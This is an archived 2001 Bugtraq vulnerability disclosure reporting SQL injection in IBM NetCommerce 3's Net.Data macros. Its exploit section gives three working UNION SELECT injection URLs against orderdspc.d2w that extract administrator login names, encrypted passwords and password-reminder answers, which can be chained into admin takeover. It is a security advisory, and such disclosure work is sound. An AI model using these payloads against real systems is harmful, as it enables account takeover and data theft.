Neohapsis Archives - Bugtraq - IBM NetCommerce Security

LOCATION: Neohapsis / Archives / Bugtraq / Message Index / IBM NetCommerce Security
From: rudi carell (rudicarell@HOTMAIL.COM) Date: Mon Feb 05 2001 - 12:13:10 CST Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] hola friends, while i was participating on the openhack contest i found a couple of serious security-holes within ibm s so called "netcommerce" thing which seems to be a mixture of websphere, net.data, servlets, jsp s and db2? however..summary: class: input validation error remote: yes local: yes vulnerable: ibm netcommerce 3??? description: besides well known websphere-bugs (file thru disclosure and default-admin passwords) ... the most dangerous bugs result from NON-existing input validation within netcommerc s net.data "macros". by crafting malformed http-requests it is possible to extract "any" netcommerce-database-information. combining this method with other default-"netcommerce" funcionality (PasswordReset for example) it is possible to take hold of so called "store-" or "site-manager"-accounts. once youre an nc-administrator you are allowed to use all the admin-tools. at this point youre able to up- and download files, issue op-system-commands or do any query with the very very high-privileged DB2INST1 account. this can lead to a possible take-over of the whole system.... many "default-macros" are vulnerable to this (classic:-) sort of attack. exploit: a few examples: 1) "HowTo find Administrator Accounts" http://shophost.com/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?order_rn=99999+union+select+shlogid+as+mestname,0+from+shopper+where+shshtyp+%3d+'A'; 2) "Passwords(crypted)" http://shophost.com/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?order_rn=99999+union+select+shlpswd+as+mestname,0+from+shopper+where+shlogid+%3d+'ncadmin'; 3) "Password-Reminders" http://shophost.com/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?order_rn=99999+union+select+shchaans+as+mestname,0+from+shopper+where+shlogid+%3d+'ncadmin'; of course "orderdspc.d2w" is not the only vulnerable macro .. it s just an example. casting between different data-types is possible (read the db2-man pages). also it should(not proofed) be possible to query other databases. vendor status: this mail was sent to "ers@ers.ibm.com" last week. (ers = emergency response team) nice day, rc rudicarell@hotmail.com security@freefly.com <FLAME> due to the very unprofessional(or should i say unfair) system-setup of the openhack-servers i was not able to proof the whole concept </FLAME> _________________________________________________________________________ Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com. Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Portions of this site are copyright 1998-2001, Neohapsis, Inc. Questions, comments or feedback, send E-mail to webmaster@neohapsis.com